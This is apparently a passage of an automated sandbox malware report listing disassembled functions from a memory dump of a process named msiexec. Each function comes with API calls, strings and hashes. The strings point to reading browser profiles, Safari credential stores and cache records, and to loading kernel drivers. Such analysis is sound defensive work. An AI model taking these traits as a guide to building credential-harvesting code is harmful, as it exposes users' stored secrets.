                                                              Download Yara Rule
                                                              APIs
                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                              • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                              • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                              • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                              Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                              • memset.MSVCRT ref: 0040265F
                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                              • API String ID: 577499730-1134094380
                                                              • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                              • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                              Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                              • String ID: :stringdata$ftp://$http://$https://
                                                              • API String ID: 2787044678-1921111777
                                                              • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                              • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                              Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                              • GetDC.USER32 ref: 004140E3
                                                              • wcslen.MSVCRT ref: 00414123
                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                              • _snwprintf.MSVCRT ref: 00414244
                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 2080319088-3046471546
                                                              • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                              • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                              Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                              • memset.MSVCRT ref: 00413292
                                                              • memset.MSVCRT ref: 004132B4
                                                              • memset.MSVCRT ref: 004132CD
                                                              • memset.MSVCRT ref: 004132E1
                                                              • memset.MSVCRT ref: 004132FB
                                                              • memset.MSVCRT ref: 00413310
                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                              • memset.MSVCRT ref: 004133C0
                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                              • wcscpy.MSVCRT ref: 0041341F
                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                              Strings
                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                              • {Unknown}, xrefs: 004132A6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                              • API String ID: 4111938811-1819279800
                                                              • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                              • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                              Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                              • String ID:
                                                              • API String ID: 829165378-0
                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                              Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 004041D6
                                                              • wcscpy.MSVCRT ref: 004041E7
                                                              • memset.MSVCRT ref: 00404200
                                                              • memset.MSVCRT ref: 00404215
                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                              • wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 0040426E
                                                              • memset.MSVCRT ref: 004042CD
                                                              • memset.MSVCRT ref: 004042E2
                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                              • wcscpy.MSVCRT ref: 00404311
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                              • API String ID: 2454223109-1580313836
                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                              Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                              • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                              • API String ID: 4054529287-3175352466
                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                              Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 3143752011-1996832678
                                                              • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                              • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                              Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                              • API String ID: 667068680-2887671607
                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                              Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                              • API String ID: 1607361635-601624466
                                                              • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                              • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                              Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf$memset$wcscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 2000436516-3842416460
                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                              Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1043902810-0
                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                              Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • free.MSVCRT ref: 0040E49A
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                              • memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E407
                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E422
                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                              • API String ID: 3849927982-2252543386
                                                              • Opcode ID: be3527b3cb58d89c6039673a6ef97e93764ef87434a313ef4869442e38f47346
                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                              • Opcode Fuzzy Hash: be3527b3cb58d89c6039673a6ef97e93764ef87434a313ef4869442e38f47346
                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                              Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                              • wcscpy.MSVCRT ref: 004448B4
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                              • API String ID: 2899246560-1542517562
